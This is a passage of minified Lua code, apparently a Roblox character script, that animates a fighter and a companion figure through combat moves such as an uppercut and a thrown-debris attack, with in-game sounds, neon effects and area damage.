LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,-0.3)*ANGLES(RAD(90),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.35,-0.3)*ANGLES(RAD(80),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.4,-0.5)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-1),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-0.4,-0.5)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-1),RAD(0),RAD(0)),1/Animation_Speed)end;coroutine.resume(coroutine.create(function()repeat Swait()RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-25),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(140),RAD(0),RAD(0))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(0))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.5*fG,-0.5)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(-90),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,-0.3)*ANGLES(RAD(90),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.35,-0.3)*ANGLES(RAD(80),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.4,-0.5)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-1),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-0.4,-0.5)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-1),RAD(0),RAD(0)),1/Animation_Speed)until e9==true or mB==false end))local FLOOR;for T=1,80 do Swait()local nI,nJ=Raycast(RootPart.Position,RootPart.CFrame.lookVector,6,Character)if nI then FLOOR=nI;e9=true;local g8=VT(0,RootPart.Orientation.Y,0)RootPart.CFrame=CF(nJ+VT(0,3.5,0))RootPart.Orientation=g8;RootJoint.Parent=RootPart;break else RootPart.CFrame=RootPart.CFrame*CF(0,0,-6)end end;mQ=true;if FLOOR then do local nR=false;Humanoid.PlatformStand=false;local mT=true;local nB=false;coroutine.resume(coroutine.create(function()local nS=MRANDOM(8,13)for T=1,nS do local nT=CreatePart(3,Effects,FLOOR.Material,0,0,FLOOR.BrickColor,"Debree",VT(1,1,1)*MRANDOM(2,7),true)nT.CFrame=CF(RootPart.Position-VT(0,7,0))*ANGLES(RAD(0),RAD(360/nS*T),RAD(0))*CF(0,0,MRANDOM(20,28))*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))table.insert(nt,{nT,nT.Orientation,CF(nT.Position+VT(0,MRANDOM(3,7)+8,0))})end;repeat Swait()for mR=1,#nt do local nU=nt[mR][1]nU.CFrame=Clerp(nU.CFrame,nt[mR][3],0.3)nU.Orientation=nt[mR][2]end until nB==true or mB==false;if nB==false then for mR=1,#nt do local nU=nt[mR][1]nU.Anchored=false;Debris:AddItem(nU,4)end else for mR=1,#nt do do local nU=nt[mR][1]nU.CFrame=CF(nU.Position,Mouse.Hit.p)coroutine.resume(coroutine.create(function()for T=1,150 do Swait()local nI,nJ,nV=Raycast(nU.Position,nU.CFrame.lookVector,3,Character)if nI then break else nU.CFrame=nU.CFrame*CF(0,0,-3)end end;ApplyAoE(nU.Position,22,10,15,70,false)WACKYEFFECT({EffectType="Box",Size=nU.Size,Size2=nU.Size*1.2,Transparency=0,Transparency2=1,CFrame=nU.CFrame,MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})WACKYEFFECT({Time=15,EffectType="Sphere",Size=nU.Size,Size2=VT(35,35,35),Transparency=0.8,Transparency2=1,CFrame=CF(nU.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=174580476,SoundPitch=1,SoundVolume=3})nU:remove()end))Swait(5)end end end end))local no=FacialShadow()CreateSound(765590102,Torso,2,MRANDOM(8,12)/10,false)KEY=Mouse.KeyDown:connect(function(nW)if nW=="e"then KEY:Disconnect()nR=true end end)for T=0,2,0.1/Animation_Speed do Swait()if nR==true then break end;RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.25*COS(mG/12))*ANGLES(RAD(-5+2*SIN(mG/12)),RAD(15),RAD(35)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25-2*SIN(mG/12)),RAD(0),RAD(-35)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(60))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(-60))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.3*fG,-0.6*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0.5,-0.5)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(35),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(12))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.5,-0.5)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-0.5,-0.5)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;if KEY then KEY:Disconnect()end;if nR==true then for T=0,0.3,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(-25)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(0),RAD(0),RAD(25)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.5*fG)*ANGLES(RAD(0),RAD(0),RAD(-90))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(0))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(3))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-3))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)end;nB=true;for T=0,1,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(45)),2/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(0),RAD(0),RAD(-35)),2/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(90))*mx,2/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(0))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(3))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-3))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)end end;no()end end;mT=false;mB=false;mF=false;pewhandle.Anchored=false;brug=true;bruhmom=true end;function Uppercut()mB=true;mF=false;local nP={}l=12;for T=0,1,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(-45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(90),RAD(0),RAD(-45))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(-25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(90),RAD(0),RAD(25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;CreateSound(588693579,RightArm2,6,MRANDOM(8,12)/10,false)for T=0,0.3,0.1/Animation_Speed do Swait()WACKYEFFECT({EffectType="Box",Size=RightArm2.Size,Size2=RightArm2.Size,Transparency=RightArm2.Transparency,Transparency2=1,CFrame=RightArm2.CFrame,MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,3,-5),0.4)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(45),RAD(0),RAD(45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(-45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(80),RAD(0),RAD(45))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(-25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.35,0.5,0)*ANGLES(RAD(140),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;mT=true;local nR=false;local nX=false;local nY=0;local nZ=200;local no=FacialShadow()for T=0,0.5,0.1/Animation_Speed do Swait()if nR==true then break end;WACKYEFFECT({EffectType="Box",Size=RightArm2.Size,Size2=RightArm2.Size,Transparency=RightArm2.Transparency,Transparency2=1,CFrame=RightArm2.CFrame,MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,3,-5),0.5)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(45),RAD(0),RAD(45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(-45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(185),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(-25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.35,0.5,0)*ANGLES(RAD(140),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;if#nP>0 then KEY=Mouse.KeyDown:connect(function(nW)if nW=="r"and nX==false then if nR==false then nR=true end;nX=true;nZ=70;nY=nY+1;CreateSound(217767125,RightArm,10,1,false)for T=0,0.25,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.2)*ANGLES(RAD(0),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(90),RAD(0),RAD(90))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-15-1*SIN(mG/6)))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.5*fG,-0.5*fG)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0.1)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(90),RAD(0),RAD(90))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0.4)*ANGLES(RAD(-25),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1.1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1.1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)end;nX=false end end)end;for T=0,1,0.1/Animation_Speed do Swait()if nR==true then break end;RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,3,-5),0.5)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(45),RAD(0),RAD(45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(-45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(185),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(-25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.35,0.5,0)*ANGLES(RAD(140),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;if nR==true then mF=true;repeat Swait()if nX==false then nZ=nZ-1;if nZ<=0 then nR=false end;RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(120))*ANGLES(RAD(0),RAD(-90),RAD(0))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-15-1*SIN(mG/6)))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.5*fG,-0.5*fG)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(120))*ANGLES(RAD(0),RAD(-90),RAD(0))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0.4)*ANGLES(RAD(-25),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)end until nR==false end;if KEY then KEY:Disconnect()end;if nY>4 then CreateSound(1535994137,Head,10,1,false)for T=0,2.4,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.25*COS(mG/12))*ANGLES(RAD(-5+2*SIN(mG/12)),RAD(15),RAD(35)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25-2*SIN(mG/12)),RAD(0),RAD(-35)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(60))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(-60))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Anim